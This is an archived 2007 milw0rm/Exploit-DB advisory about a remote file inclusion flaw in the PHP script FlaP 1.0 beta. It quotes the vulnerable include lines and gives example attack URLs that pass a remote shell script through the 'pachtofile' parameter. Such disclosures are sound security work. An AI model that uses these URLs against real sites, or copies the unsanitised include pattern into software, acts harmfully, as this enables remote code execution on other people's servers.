FlaP 1.0b - 'pachtofile' Remote File Inclusion

EDB-ID:

3992




Platform:

PHP

Date:

2007-05-25


##############################################################################################
# FlaP v.1.0. Beta  <=  Remote File Inclusion Vulnerability                                  #
#                                                                                            #

#                                                                                            #
##############################################################################################
#Vuln Code                                                                                   #  

#                                                                                            # 
#ERROR1:skin/html/table.php                                                                  # 
#                                                                                            # 

# <? include "$pachtofile/left_menu.php"; <<< RFI CODE                                       # 
#                                                                                            # 

#                                                                                            # 
#BUG1:                                                                                       # 
#                                                                                            # 

#Example1:http://victim.com/path/skin/html/table.php?pachtofile=[[Sh3LL Script]]             #
##############################################################################################

#                                                                                            # 
#ERROR2:login.php                                                                            # 
#                                                                                            # 

#<? include "$pachtofile/right_menu.php"; ?></ <<< RFI CODE                                  #
#                                                                                            # 

#                                                                                            # 
#BUG2:                                                                                       # 
#                                                                                            # 

#Example1:http://victim.com/path/login.php?pachtofile=[[Sh3LL Script]]                       #
##############################################################################################


##############################################################################################
#                                                                                            # 
#Script Download                                                                             # 

##############################################################################################
#                                                                                            # 
#http://scripts.protoplex.ru/scripts_show/1854.html                                          # 

#                                                                                            # 
##############################################################################################
#                                                                                            # 

#Cyber-Security                                                                              # 
#                                                                                            # 
##############################################################################################

# milw0rm.com [2007-05-25]